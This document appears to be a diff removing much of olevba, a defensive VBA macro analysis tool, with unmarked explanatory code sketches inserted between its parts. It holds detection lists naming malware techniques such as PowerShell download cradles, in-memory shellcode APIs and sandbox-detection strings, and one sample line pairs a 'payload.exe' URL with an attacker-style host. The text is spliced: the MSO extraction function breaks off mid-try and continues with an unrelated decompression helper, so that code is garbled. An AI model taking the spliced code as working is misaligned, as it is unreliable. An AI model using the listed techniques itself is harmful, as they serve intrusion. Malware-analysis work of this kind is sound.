- if isinstance(exc, UnicodeDecodeError):
- u = "".join("\\x{0:02x}".format(c) for c in exc.object[exc.start:exc.end])
- return (u, exc.end)
- return _backslashreplace_errors(exc)
-
- codecs.register_error("backslashreplace", backslashreplace_errors)
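On Python 3.5 and later, "backslashreplace" already works for decoding, which is exactly what the shim above backports to Python 3.0-3.4; a quick sketch of the behavior being emulated:

```python
# Undecodable bytes become \xNN escapes instead of raising
# UnicodeDecodeError (built-in behavior on Python 3.5+):
data = b'MZ\x90\xff'
text = data.decode('ascii', errors='backslashreplace')
assert text == 'MZ\\x90\\xff'
```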
-
-
-# === LOGGING =================================================================
-
-class NullHandler(logging.Handler):
- """
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
- """
- def emit(self, record):
- pass
-
-def get_logger(name, level=logging.CRITICAL+1):
- """
- Create a suitable logger object for this module.
- The goal is not to change settings of the root logger, to avoid getting
- other modules' logs on the screen.
- If a logger exists with same name, reuse it. (Else it would have duplicate
- handlers and messages would be doubled.)
- The level is set to CRITICAL+1 by default, to avoid any logging.
- """
- # First, test if there is already a logger with the same name, else it
- # will generate duplicate messages (due to duplicate handlers):
- if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
- # use getLogger then test if its effective level is not default.
- logger = logging.getLogger(name)
- # make sure level is OK:
- logger.setLevel(level)
- return logger
- # get a new logger:
- logger = logging.getLogger(name)
- # only add a NullHandler for this logger, it is up to the application
- # to configure its own logging:
- logger.addHandler(NullHandler())
- logger.setLevel(level)
- return logger
-
-# a global logger object used for debugging:
-log = get_logger('olevba')
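The same pattern can be sketched with the stdlib `logging.NullHandler` (available since Python 2.7); `get_module_logger` is a hypothetical name for this sketch, not olevba's actual API:

```python
import logging

def get_module_logger(name, level=logging.CRITICAL + 1):
    # Reuse an existing logger to avoid stacking duplicate handlers;
    # otherwise only attach a NullHandler and leave configuration to the app.
    if name in logging.Logger.manager.loggerDict:
        logger = logging.getLogger(name)
        logger.setLevel(level)
        return logger
    logger = logging.getLogger(name)
    logger.addHandler(logging.NullHandler())
    logger.setLevel(level)
    return logger

log_a = get_module_logger('demo_module')
log_b = get_module_logger('demo_module')
assert log_a is log_b                    # same logger object is reused
assert len(log_a.handlers) == 1          # handler is not duplicated
assert not log_a.isEnabledFor(logging.CRITICAL)  # CRITICAL+1 silences all
```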
-
-
-#=== EXCEPTIONS ==============================================================
-
-class OlevbaBaseException(Exception):
- """ Base class for exceptions produced here for simpler except clauses """
- def __init__(self, msg, filename=None, orig_exc=None, **kwargs):
- if orig_exc:
- super(OlevbaBaseException, self).__init__(msg +
- ' ({0})'.format(orig_exc),
- **kwargs)
- else:
- super(OlevbaBaseException, self).__init__(msg, **kwargs)
- self.msg = msg
- self.filename = filename
- self.orig_exc = orig_exc
-
-
-class FileOpenError(OlevbaBaseException):
- """ raised by VBA_Parser constructor if all open_... attempts failed
-
- probably means the file type is not supported
- """
-
- def __init__(self, filename, orig_exc=None):
- super(FileOpenError, self).__init__(
- 'Failed to open file %s' % filename, filename, orig_exc)
-
-
-class ProcessingError(OlevbaBaseException):
- """ raised by VBA_Parser.process_file* functions """
-
- def __init__(self, filename, orig_exc):
- super(ProcessingError, self).__init__(
- 'Error processing file %s' % filename, filename, orig_exc)
-
-
-class MsoExtractionError(RuntimeError, OlevbaBaseException):
- """ raised by mso_file_extract if parsing MSO/ActiveMIME data failed """
-
- def __init__(self, msg):
- RuntimeError.__init__(self, msg)
- OlevbaBaseException.__init__(self, msg)
-
-
-class SubstreamOpenError(FileOpenError):
- """ special kind of FileOpenError: file is a substream of original file """
-
- def __init__(self, filename, subfilename, orig_exc=None):
- super(SubstreamOpenError, self).__init__(
- str(filename) + '/' + str(subfilename), orig_exc)
- self.filename = filename # overwrite setting in OlevbaBaseException
- self.subfilename = subfilename
-
-
-class UnexpectedDataError(OlevbaBaseException):
- """ raised when parsing is strict (=not relaxed) and data is unexpected """
-
- def __init__(self, stream_path, variable, expected, value):
- super(UnexpectedDataError, self).__init__(
- 'Unexpected value in {0} for variable {1}: '
- 'expected {2:04X} but found {3:04X}!'
- .format(stream_path, variable, expected, value))
- self.stream_path = stream_path
- self.variable = variable
- self.expected = expected
- self.value = value
-
-#--- CONSTANTS ----------------------------------------------------------------
-
-# return codes
-RETURN_OK = 0
-RETURN_WARNINGS = 1 # (reserved, not used yet)
-RETURN_WRONG_ARGS = 2 # (fixed, built into optparse)
-RETURN_FILE_NOT_FOUND = 3
-RETURN_XGLOB_ERR = 4
-RETURN_OPEN_ERROR = 5
-RETURN_PARSE_ERROR = 6
-RETURN_SEVERAL_ERRS = 7
-RETURN_UNEXPECTED = 8
-
-# MAC codepages (from http://stackoverflow.com/questions/1592925/decoding-mac-os-text-in-python)
-MAC_CODEPAGES = {
- 10000: 'mac-roman',
- 10001: 'shiftjis', # not found: 'mac-shift-jis',
- 10003: 'ascii', # nothing appropriate found: 'mac-hangul',
- 10008: 'gb2312', # not found: 'mac-gb2312',
- 10002: 'big5', # not found: 'mac-big5',
- 10005: 'hebrew', # not found: 'mac-hebrew',
- 10004: 'mac-arabic',
- 10006: 'mac-greek',
- 10081: 'mac-turkish',
- 10021: 'thai', # not found: mac-thai',
- 10029: 'maccentraleurope', # not found: 'mac-east europe',
- 10007: 'ascii', # nothing appropriate found: 'mac-russian',
-}
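For instance, decoding bytes with one of the Mac codepages above; a minimal sketch (the `café` sample bytes are illustrative):

```python
# MAC_CODEPAGES maps Office codepage numbers to Python codec names;
# 10000 is Mac OS Roman, where byte 0x8E encodes 'é':
codec = {10000: 'mac-roman'}.get(10000, 'ascii')
text = b'caf\x8e'.decode(codec)
assert text == 'café'
```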
-
-# URL and message to report issues:
-URL_OLEVBA_ISSUES = 'https://github.com/decalage2/oletools/issues'
-MSG_OLEVBA_ISSUES = 'Please report this issue on %s' % URL_OLEVBA_ISSUES
-
-# Container types:
-TYPE_OLE = 'OLE'
-TYPE_OpenXML = 'OpenXML'
-TYPE_Word2003_XML = 'Word2003_XML'
-TYPE_MHTML = 'MHTML'
-TYPE_TEXT = 'Text'
-TYPE_PPT = 'PPT'
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- TYPE_OLE: 'OLE:',
- TYPE_OpenXML: 'OpX:',
- TYPE_Word2003_XML: 'XML:',
- TYPE_MHTML: 'MHT:',
- TYPE_TEXT: 'TXT:',
- TYPE_PPT: 'PPT:',
-}
-
-
-# MSO files ActiveMime header magic
-MSO_ACTIVEMIME_HEADER = b'ActiveMime'
-
-MODULE_EXTENSION = "bas"
-CLASS_EXTENSION = "cls"
-FORM_EXTENSION = "frm"
-
-# Namespaces and tags for Word2003 XML parsing:
-NS_W = '{http://schemas.microsoft.com/office/word/2003/wordml}'
-# the tag contains the VBA macro code:
-TAG_BINDATA = NS_W + 'binData'
-ATTR_NAME = NS_W + 'name'
-
-# Keywords to detect auto-executable macros
-AUTOEXEC_KEYWORDS = {
- # MS Word:
- 'Runs when the Word document is opened':
- ('AutoExec', 'AutoOpen', 'DocumentOpen'),
- 'Runs when the Word document is closed':
- ('AutoExit', 'AutoClose', 'Document_Close', 'DocumentBeforeClose'),
- 'Runs when the Word document is modified':
- ('DocumentChange',),
- 'Runs when a new Word document is created':
- ('AutoNew', 'Document_New', 'NewDocument'),
-
- # MS Word and Publisher:
- 'Runs when the Word or Publisher document is opened':
- ('Document_Open',),
- 'Runs when the Publisher document is closed':
- ('Document_BeforeClose',),
-
- # MS Excel:
- 'Runs when the Excel Workbook is opened':
- ('Auto_Open', 'Workbook_Open', 'Workbook_Activate'),
- 'Runs when the Excel Workbook is closed':
- ('Auto_Close', 'Workbook_Close'),
-
- # any MS Office application:
- 'Runs when the file is opened (using InkPicture ActiveX object)':
- # ref:https://twitter.com/joe4security/status/770691099988025345
- (r'\w+_Painted',),
- 'Runs when the file is opened and ActiveX objects trigger events':
- (r'\w+_(?:GotFocus|LostFocus|MouseHover)',),
-}
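A simplified scan in the spirit of the table above can be sketched as follows; `detect_autoexec` here is a hypothetical helper, not olevba's actual API, and note that some keywords are themselves regex fragments (e.g. `\w+_Painted` for the InkPicture trigger):

```python
import re

AUTOEXEC = ('AutoExec', 'AutoOpen', 'Document_Open', 'Workbook_Open',
            r'\w+_Painted')

def detect_autoexec(vba_code):
    # Search each keyword/regex case-insensitively, on word boundaries:
    hits = []
    for keyword in AUTOEXEC:
        match = re.search(r'(?i)\b' + keyword + r'\b', vba_code)
        if match:
            hits.append(match.group())
    return hits

assert detect_autoexec('Sub AutoOpen()\nEnd Sub') == ['AutoOpen']
assert detect_autoexec('Private Sub InkPicture1_Painted()') == ['InkPicture1_Painted']
```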
-
-# Suspicious Keywords that may be used by malware
-# See VBA language reference: http://msdn.microsoft.com/en-us/library/office/jj692818%28v=office.15%29.aspx
-SUSPICIOUS_KEYWORDS = {
- #TODO: use regex to support variable whitespaces
- 'May read system environment variables':
- ('Environ',),
- 'May open a file':
- ('Open',),
- 'May write to a file (if combined with Open)':
- #TODO: regex to find Open+Write on same line
- ('Write', 'Put', 'Output', 'Print #'),
- 'May read or write a binary file (if combined with Open)':
- #TODO: regex to find Open+Binary on same line
- ('Binary',),
- 'May copy a file':
- ('FileCopy', 'CopyFile'),
- #FileCopy: http://msdn.microsoft.com/en-us/library/office/gg264390%28v=office.15%29.aspx
- #CopyFile: http://msdn.microsoft.com/en-us/library/office/gg264089%28v=office.15%29.aspx
- 'May delete a file':
- ('Kill',),
- 'May create a text file':
- ('CreateTextFile', 'ADODB.Stream', 'WriteText', 'SaveToFile'),
- #CreateTextFile: http://msdn.microsoft.com/en-us/library/office/gg264617%28v=office.15%29.aspx
- #ADODB.Stream sample: http://pastebin.com/Z4TMyuq6
- 'May run an executable file or a system command':
- ('Shell', 'vbNormal', 'vbNormalFocus', 'vbHide', 'vbMinimizedFocus', 'vbMaximizedFocus', 'vbNormalNoFocus',
- 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute'),
- #Shell: http://msdn.microsoft.com/en-us/library/office/gg278437%28v=office.15%29.aspx
- #WScript.Shell+Run sample: http://pastebin.com/Z4TMyuq6
- 'May run PowerShell commands':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- #also: https://bitbucket.org/decalage/oletools/issues/14/olevba-library-update-ioc
- # ref: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
- # TODO: add support for keywords starting with a non-alpha character, such as "-noexit"
- # TODO: '-command', '-EncodedCommand', '-scriptblock'
- ('PowerShell', 'noexit', 'ExecutionPolicy', 'noprofile', 'command', 'EncodedCommand',
- 'invoke-command', 'scriptblock', 'Invoke-Expression', 'AuthorizationManager'),
- 'May run an executable file or a system command using PowerShell':
- ('Start-Process',),
- 'May hide the application':
- ('Application.Visible', 'ShowWindow', 'SW_HIDE'),
- 'May create a directory':
- ('MkDir',),
- 'May save the current workbook':
- ('ActiveWorkbook.SaveAs',),
- 'May change which directory contains files to open at startup':
- #TODO: confirm the actual effect
- ('Application.AltStartupPath',),
- 'May create an OLE object':
- ('CreateObject',),
- 'May create an OLE object using PowerShell':
- ('New-Object',),
- 'May run an application (if combined with CreateObject)':
- ('Shell.Application',),
- 'May enumerate application windows (if combined with Shell.Application object)':
- ('Windows', 'FindWindow'),
- 'May run code from a DLL':
- #TODO: regex to find declare+lib on same line
- ('Lib',),
- 'May inject code into another process':
- ('CreateThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
- 'VirtualAllocEx', 'RtlMoveMemory',
- ),
- 'May run a shellcode in memory':
- ('EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
- 'EnumDateFormats(?:W|(?:Ex){1,2})?'), # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
- 'May download files from the Internet':
- #TODO: regex to find urlmon+URLDownloadToFileA on same line
- ('URLDownloadToFileA', 'Msxml2.XMLHTTP', 'Microsoft.XMLHTTP',
- 'MSXML2.ServerXMLHTTP', # suggested in issue #13
- 'User-Agent', # sample from @ozhermit: http://pastebin.com/MPc3iV6z
- ),
- 'May download files from the Internet using PowerShell':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('Net.WebClient', 'DownloadFile', 'DownloadString'),
- 'May control another application by simulating user keystrokes':
- ('SendKeys', 'AppActivate'),
- #SendKeys: http://msdn.microsoft.com/en-us/library/office/gg278655%28v=office.15%29.aspx
- 'May attempt to obfuscate malicious function calls':
- ('CallByName',),
- #CallByName: http://msdn.microsoft.com/en-us/library/office/gg278760%28v=office.15%29.aspx
- 'May attempt to obfuscate specific strings (use option --deobf to deobfuscate)':
- #TODO: regex to find several Chr*, not just one
- ('Chr', 'ChrB', 'ChrW', 'StrReverse', 'Xor'),
- #Chr: http://msdn.microsoft.com/en-us/library/office/gg264465%28v=office.15%29.aspx
- 'May read or write registry keys':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('RegOpenKeyExA', 'RegOpenKeyEx', 'RegCloseKey'),
- 'May read registry keys':
- #sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- ('RegQueryValueExA', 'RegQueryValueEx',
- 'RegRead', #with Wscript.Shell
- ),
- 'May detect virtualization':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- (r'SYSTEM\ControlSet001\Services\Disk\Enum', 'VIRTUAL', 'VMWARE', 'VBOX'),
- 'May detect Anubis Sandbox':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- # NOTES: this sample also checks App.EXEName but that seems to be a bug, it works in VB6 but not in VBA
- # ref: http://www.syssec-project.eu/m/page-media/3/disarm-raid11.pdf
- ('GetVolumeInformationA', 'GetVolumeInformation', # with kernel32.dll
- '1824245000', r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId',
- '76487-337-8429955-22614', 'andy', 'sample', r'C:\exec\exec.exe', 'popupkiller'
- ),
- 'May detect Sandboxie':
- # sample: https://malwr.com/analysis/M2NjZWNmMjA0YjVjNGVhYmJlZmFhNWY4NmQxZDllZTY/
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('SbieDll.dll', 'SandboxieControlWndClass'),
- 'May detect Sunbelt Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- (r'C:\file.exe',),
- 'May detect Norman Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('currentuser',),
- 'May detect CW Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('Schmidti',),
- 'May detect WinJail Sandbox':
- # ref: http://www.cplusplus.com/forum/windows/96874/
- ('Afx:400000:0',),
-}
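The table above is consumed by scanning the VBA source for each keyword; a hypothetical mini-scanner with a two-entry subset (olevba's real implementation covers every entry, case-insensitively):

```python
import re

SUSPICIOUS = {
    'May run an executable file or a system command':
        ('Shell', 'WScript.Shell'),
    'May download files from the Internet':
        ('URLDownloadToFileA', 'Microsoft.XMLHTTP'),
}

def scan_suspicious(vba_code):
    # Return (keyword, description) for every keyword found in the code:
    results = []
    for description, keywords in SUSPICIOUS.items():
        for keyword in keywords:
            if re.search(r'(?i)\b' + re.escape(keyword) + r'\b', vba_code):
                results.append((keyword, description))
    return results

code = 'Set xml = CreateObject("Microsoft.XMLHTTP")\nShell cmd, vbHide'
hits = scan_suspicious(code)
assert ('Shell', 'May run an executable file or a system command') in hits
assert ('Microsoft.XMLHTTP', 'May download files from the Internet') in hits
```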
-
-# Regular Expression for a URL:
-# http://en.wikipedia.org/wiki/Uniform_resource_locator
-# http://www.w3.org/Addressing/URL/uri-spec.html
-#TODO: also support username:password@server
-#TODO: other protocols (file, gopher, wais, ...?)
-SCHEME = r'\b(?:http|ftp)s?'
-# see http://en.wikipedia.org/wiki/List_of_Internet_top-level_domains
-TLD = r'(?:xn--[a-zA-Z0-9]{4,20}|[a-zA-Z]{2,20})'
-DNS_NAME = r'(?:[a-zA-Z0-9\-\.]+\.' + TLD + ')'
-#TODO: IPv6 - see https://www.debuggex.com/
-# A literal numeric IPv6 address may be given, but must be enclosed in [ ] e.g. [db8:0cec::99:123a]
-NUMBER_0_255 = r'(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])'
-IPv4 = r'(?:' + NUMBER_0_255 + r'\.){3}' + NUMBER_0_255
-# IPv4 must come before the DNS name because it is more specific
-SERVER = r'(?:' + IPv4 + '|' + DNS_NAME + ')'
-PORT = r'(?:\:[0-9]{1,5})?'
-SERVER_PORT = SERVER + PORT
-URL_PATH = r'(?:/[a-zA-Z0-9\-\._\?\,\'/\\\+&%\$#\=~]*)?' # [^\.\,\)\(\s"]
-URL_RE = SCHEME + r'\://' + SERVER_PORT + URL_PATH
-re_url = re.compile(URL_RE)
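Re-assembling the same building blocks shows what `URL_RE` matches in practice; a self-contained sketch (the sample URLs are illustrative):

```python
import re

# Same components as above, composed into one pattern:
SCHEME = r'\b(?:http|ftp)s?'
TLD = r'(?:xn--[a-zA-Z0-9]{4,20}|[a-zA-Z]{2,20})'
DNS_NAME = r'(?:[a-zA-Z0-9\-\.]+\.' + TLD + ')'
NUMBER_0_255 = r'(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])'
IPv4 = r'(?:' + NUMBER_0_255 + r'\.){3}' + NUMBER_0_255
SERVER_PORT = r'(?:' + IPv4 + '|' + DNS_NAME + ')' + r'(?:\:[0-9]{1,5})?'
URL_PATH = r'(?:/[a-zA-Z0-9\-\._\?\,\'/\\\+&%\$#\=~]*)?'
re_url = re.compile(SCHEME + r'\://' + SERVER_PORT + URL_PATH)

text = 'GET http://192.168.1.10:8080/payload.exe then https://evil.example.com/x'
assert re_url.findall(text) == ['http://192.168.1.10:8080/payload.exe',
                                'https://evil.example.com/x']
```

Because every group in the pattern is non-capturing, `findall` returns the full matched URLs rather than group contents.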
-
-
-# Patterns to be extracted (IP addresses, URLs, etc)
-# From patterns.py in balbuzard
-RE_PATTERNS = (
- ('URL', re.compile(URL_RE)),
- ('IPv4 address', re.compile(IPv4)),
- # TODO: add IPv6
- ('E-mail address', re.compile(r'(?i)\b[A-Z0-9._%+-]+@' + SERVER + r'\b')),
- ('Domain name', re.compile(r'(?=^.{1,254}$)(^(?:(?!\d+\.|-)[a-zA-Z0-9_\-]{1,63}(?<!-)\.?)+(?:[a-zA-Z]{2,})$)')),
-)
-
-
-# --- CHR --------------------------------------------------------------------
-
-# Chr(n) => char
-vba_chr = Suppress(
- Combine(WordStart(vba_identifier_chars) + CaselessLiteral('Chr')
- + Optional(CaselessLiteral('B') | CaselessLiteral('W')) + Optional('$'))
- + '(') + vba_expr_int + Suppress(')')
-
-def vba_chr_tostr(t):
- try:
- i = t[0]
- # normal, non-unicode character:
- if i>=0 and i<=255:
- return VbaExpressionString(chr(i))
- else:
- return VbaExpressionString(chr(i).encode('utf-8', 'backslashreplace'))
- except ValueError:
- log.exception('ERROR: incorrect parameter value for chr(): %r' % i)
- return VbaExpressionString('Chr(%r)' % i)
-
-vba_chr.setParseAction(vba_chr_tostr)
-
-
-# --- ASC --------------------------------------------------------------------
-
-# Asc(char) => int
-#TODO: see MS-VBAL 6.1.2.11.1.1 page 240 => AscB, AscW
-vba_asc = Suppress(CaselessKeyword('Asc') + '(') + vba_expr_str + Suppress(')')
-vba_asc.setParseAction(lambda t: ord(t[0]))
-
-
-# --- VAL --------------------------------------------------------------------
-
-# Val(string) => int
-# TODO: make sure the behavior of VBA's val is fully covered
-vba_val = Suppress(CaselessKeyword('Val') + '(') + vba_expr_str + Suppress(')')
-vba_val.setParseAction(lambda t: int(t[0].strip()))
-
-
-# --- StrReverse() --------------------------------------------------------------------
-
-# StrReverse(string) => string
-strReverse = Suppress(CaselessKeyword('StrReverse') + '(') + vba_expr_str + Suppress(')')
-strReverse.setParseAction(lambda t: VbaExpressionString(str(t[0])[::-1]))
-
-
-# --- ENVIRON() --------------------------------------------------------------------
-
-# Environ("name") => just translated to "%name%", that is enough for malware analysis
-environ = Suppress(CaselessKeyword('Environ') + '(') + vba_expr_str + Suppress(')')
-environ.setParseAction(lambda t: VbaExpressionString('%%%s%%' % t[0]))
-
-
-# --- IDENTIFIER -------------------------------------------------------------
-
-#TODO: see MS-VBAL 3.3.5 page 33
-# 3.3.5 Identifier Tokens
-# Latin-identifier = first-Latin-identifier-character *subsequent-Latin-identifier-character
-# first-Latin-identifier-character = (%x0041-005A / %x0061-007A) ; A-Z / a-z
-# subsequent-Latin-identifier-character = first-Latin-identifier-character / DIGIT / %x5F ; underscore
-latin_identifier = Word(initChars=alphas, bodyChars=alphanums + '_')
-
-# --- HEX FUNCTION -----------------------------------------------------------
-
-# match any custom function name with a hex string as argument:
-# TODO: accept vba_expr_str_item as argument, check if it is a hex or base64 string at runtime
-
-# quoted string of at least two hexadecimal numbers of two digits:
-quoted_hex_string = Suppress('"') + Combine(Word(hexnums, exact=2) * (2, None)) + Suppress('"')
-quoted_hex_string.setParseAction(lambda t: str(t[0]))
-
-hex_function_call = Suppress(latin_identifier) + Suppress('(') + \
- quoted_hex_string('hex_string') + Suppress(')')
-hex_function_call.setParseAction(lambda t: VbaExpressionString(binascii.a2b_hex(t.hex_string)))
-
-
-# --- BASE64 FUNCTION -----------------------------------------------------------
-
-# match any custom function name with a Base64 string as argument:
-# TODO: accept vba_expr_str_item as argument, check if it is a hex or base64 string at runtime
-
-# quoted string of at least two hexadecimal numbers of two digits:
-quoted_base64_string = Suppress('"') + Regex(BASE64_RE) + Suppress('"')
-quoted_base64_string.setParseAction(lambda t: str(t[0]))
-
-base64_function_call = Suppress(latin_identifier) + Suppress('(') + \
- quoted_base64_string('base64_string') + Suppress(')')
-base64_function_call.setParseAction(lambda t: VbaExpressionString(binascii.a2b_base64(t.base64_string)))
-
-
-# ---STRING EXPRESSION -------------------------------------------------------
-
-def concat_strings_list(tokens):
- """
- parse action to concatenate strings in a VBA expression with operators '+' or '&'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of strings such as [a,'&',b,'&',c,...]
- strings = tokens[0][::2]
- return VbaExpressionString(''.join(strings))
-
-
-vba_expr_str_item = (vba_chr | strReverse | environ | quoted_string | hex_function_call | base64_function_call)
-
-vba_expr_str <<= infixNotation(vba_expr_str_item,
- [
- ("+", 2, opAssoc.LEFT, concat_strings_list),
- ("&", 2, opAssoc.LEFT, concat_strings_list),
- ])
-
-
-# --- INTEGER EXPRESSION -------------------------------------------------------
-
-def sum_ints_list(tokens):
- """
- parse action to sum integers in a VBA expression with operator '+'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return sum(integers)
-
-
-def subtract_ints_list(tokens):
- """
- parse action to subtract integers in a VBA expression with operator '-'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x-y, integers)
-
-
-def multiply_ints_list(tokens):
- """
- parse action to multiply integers in a VBA expression with operator '*'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x*y, integers)
-
-
-def divide_ints_list(tokens):
- """
- parse action to divide integers in a VBA expression with operator '/'
- """
- # extract argument from the tokens:
- # expected to be a tuple containing a list of integers such as [a,'&',b,'&',c,...]
- integers = tokens[0][::2]
- return reduce(lambda x,y:x/y, integers)
-
-
-vba_expr_int_item = (vba_asc | vba_val | integer)
-
-# operators associativity:
-# https://en.wikipedia.org/wiki/Operator_associativity
-
-vba_expr_int <<= infixNotation(vba_expr_int_item,
- [
- ("*", 2, opAssoc.LEFT, multiply_ints_list),
- ("/", 2, opAssoc.LEFT, divide_ints_list),
- ("-", 2, opAssoc.LEFT, subtract_ints_list),
- ("+", 2, opAssoc.LEFT, sum_ints_list),
- ])
-
-
-# see detect_vba_strings for the deobfuscation code using this grammar
-
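The grammar above needs pyparsing to run, but its effect on a typical obfuscated expression can be sketched with a plain-regex stand-in; this simplified `deobfuscate_chr_expr` (a hypothetical helper, not olevba's API) only handles decimal `Chr(n)` calls and concatenation of quoted literals:

```python
import re

def deobfuscate_chr_expr(expr):
    # Replace each Chr(n) call with the quoted character it produces...
    expr = re.sub(r'(?i)\bChr\s*\(\s*(\d+)\s*\)',
                  lambda m: '"%s"' % chr(int(m.group(1))), expr)
    # ...then concatenate all quoted string literals, as '&' and '+' would:
    return ''.join(re.findall(r'"([^"]*)"', expr))

assert deobfuscate_chr_expr('Chr(104) & Chr(116) & "tp://" & Chr(101)') == 'http://e'
```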
-# === MSO/ActiveMime files parsing ===========================================
-
-def is_mso_file(data):
- """
- Check if the provided data is the content of a MSO/ActiveMime file, such as
- the ones created by Outlook in some cases, or Word/Excel when saving a
- file with the MHTML format or the Word 2003 XML format.
- This function only checks the ActiveMime magic at the beginning of data.
- :param data: bytes string, MSO/ActiveMime file content
- :return: bool, True if the file is MSO, False otherwise
- """
- return data.startswith(MSO_ACTIVEMIME_HEADER)
-
-
-# regex to find zlib block headers, starting with byte 0x78 = 'x'
-re_zlib_header = re.compile(r'x')
-
-
-def mso_file_extract(data):
- """
- Extract the data stored into a MSO/ActiveMime file, such as
- the ones created by Outlook in some cases, or Word/Excel when saving a
- file with the MHTML format or the Word 2003 XML format.
-
- :param data: bytes string, MSO/ActiveMime file content
- :return: bytes string, extracted data (uncompressed)
-
- raise a MsoExtractionError if the data cannot be extracted
- """
- # check the magic:
- assert is_mso_file(data)
-
- # In all the samples seen so far, Word always uses an offset of 0x32,
- # and Excel 0x22A. But we read the offset from the header to be more
- # generic.
- offsets = [0x32, 0x22A]
-
- # First, attempt to get the compressed data offset from the header
- # According to my tests, it should be an unsigned 16 bits integer,
- # at offset 0x1E (little endian) + add 46:
- try:
- offset = struct.unpack_from('<H', data, offset=0x1E)[0] + 46
- length_mask = 0xFFFF >> bit_count
- offset_mask = ~length_mask
- maximum_length = (0xFFFF >> bit_count) + 3
- return length_mask, offset_mask, bit_count, maximum_length
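The mask computation ending above (MS-OVBA 2.4.1.3.19.1, CopyToken Help) can be exercised on its own; a self-contained sketch of the same logic:

```python
import math

def copytoken_help(decompressed_current, decompressed_chunk_start):
    # Split the 16-bit CopyToken into offset/length fields whose widths
    # depend on how much of the current chunk is already decompressed:
    difference = decompressed_current - decompressed_chunk_start
    bit_count = max(int(math.ceil(math.log(difference, 2))), 4)
    length_mask = 0xFFFF >> bit_count
    offset_mask = (~length_mask) & 0xFFFF
    maximum_length = (0xFFFF >> bit_count) + 3
    return length_mask, offset_mask, bit_count, maximum_length

# Early in a chunk (difference <= 16) the offset field is 4 bits wide:
assert copytoken_help(9, 0) == (0x0FFF, 0xF000, 4, 4098)
# Deep into a chunk (difference 4096) it grows to 12 bits:
assert copytoken_help(4096, 0) == (0x000F, 0xFFF0, 12, 18)
```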
-
-
-def decompress_stream(compressed_container):
- """
- Decompress a stream according to MS-OVBA section 2.4.1
-
- compressed_container: string compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
- return the decompressed container as a string (bytes)
- """
- # 2.4.1.2 State Variables
-
- # The following state is maintained for the CompressedContainer (section 2.4.1.1.1):
- # CompressedRecordEnd: The location of the byte after the last byte in the CompressedContainer (section 2.4.1.1.1).
- # CompressedCurrent: The location of the next byte in the CompressedContainer (section 2.4.1.1.1) to be read by
- # decompression or to be written by compression.
-
- # The following state is maintained for the current CompressedChunk (section 2.4.1.1.4):
- # CompressedChunkStart: The location of the first byte of the CompressedChunk (section 2.4.1.1.4) within the
- # CompressedContainer (section 2.4.1.1.1).
-
- # The following state is maintained for a DecompressedBuffer (section 2.4.1.1.2):
- # DecompressedCurrent: The location of the next byte in the DecompressedBuffer (section 2.4.1.1.2) to be written by
- # decompression or to be read by compression.
- # DecompressedBufferEnd: The location of the byte after the last byte in the DecompressedBuffer (section 2.4.1.1.2).
-
- # The following state is maintained for the current DecompressedChunk (section 2.4.1.1.3):
- # DecompressedChunkStart: The location of the first byte of the DecompressedChunk (section 2.4.1.1.3) within the
- # DecompressedBuffer (section 2.4.1.1.2).
-
- decompressed_container = b'' # result
- compressed_current = 0
-
- sig_byte = compressed_container[compressed_current]
- if sig_byte != 0x01:
- raise ValueError('invalid signature byte {0:02X}'.format(sig_byte))
-
- compressed_current += 1
-
- #NOTE: the definition of CompressedRecordEnd is ambiguous. Here we assume that
- # CompressedRecordEnd = len(compressed_container)
- while compressed_current < len(compressed_container):
- # 2.4.1.1.5
- compressed_chunk_start = compressed_current
- # chunk header = first 16 bits
- compressed_chunk_header = \
- struct.unpack("<H", compressed_container[compressed_chunk_start:compressed_chunk_start + 2])[0]
- # chunk size = 12 first bits of header + 3
- chunk_size = (compressed_chunk_header & 0x0FFF) + 3
- # chunk signature = 3 next bits - should always be 0b011
- chunk_signature = (compressed_chunk_header >> 12) & 0x07
- if chunk_signature != 0b011:
- raise ValueError('Invalid CompressedChunkSignature in VBA compressed stream')
- # chunk flag = next bit - 1 == compressed, 0 == uncompressed
- chunk_flag = (compressed_chunk_header >> 15) & 0x01
- log.debug("chunk size = {0}, compressed flag = {1}".format(chunk_size, chunk_flag))
-
